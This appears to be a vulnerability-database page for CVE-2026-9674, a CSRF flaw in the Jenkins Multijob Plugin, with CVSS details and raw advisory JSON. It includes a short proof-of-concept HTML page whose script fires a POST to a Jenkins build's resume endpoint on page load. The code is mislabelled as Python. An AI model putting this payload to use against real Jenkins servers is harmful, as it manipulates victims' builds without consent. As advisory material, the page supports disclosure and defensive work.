Security Vulnerability Report
中文
CVE-2026-9674 CVSS 4.3 MEDIUM

CVE-2026-9674

Published: 2026-05-27 15:16:36
Last Modified: 2026-05-27 17:16:47

Description

A cross-site request forgery (CSRF) vulnerability in Jenkins Multijob Plugin 662.vd2e0001f6b_b_d and earlier allows attackers to resume failed Multijob builds.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Jenkins Multijob Plugin <= 662.vd2e0001f6b_b_d

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-9674: CSRF to resume failed Multijob build --> <!-- Attacker needs to host this file and send the link to a victim with Jenkins session --> <html> <body> <h1>Loading...</h1> <script> // Replace with actual Jenkins job URL and build number var targetUrl = "http://target-jenkins.com/job/Multijob-Test/1/resume"; function csrfRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", targetUrl, true); // Send any required parameters if necessary, usually cookies are sent automatically by browser xhr.send(); } // Execute automatically on page load csrfRequest(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9674", "sourceIdentifier": "[email protected]", "published": "2026-05-27T15:16:36.080", "lastModified": "2026-05-27T17:16:46.653", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site request forgery (CSRF) vulnerability in Jenkins Multijob Plugin 662.vd2e0001f6b_b_d and earlier allows attackers to resume failed Multijob builds."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2026-05-27/#SECURITY-3781", "source": "[email protected]"}]}}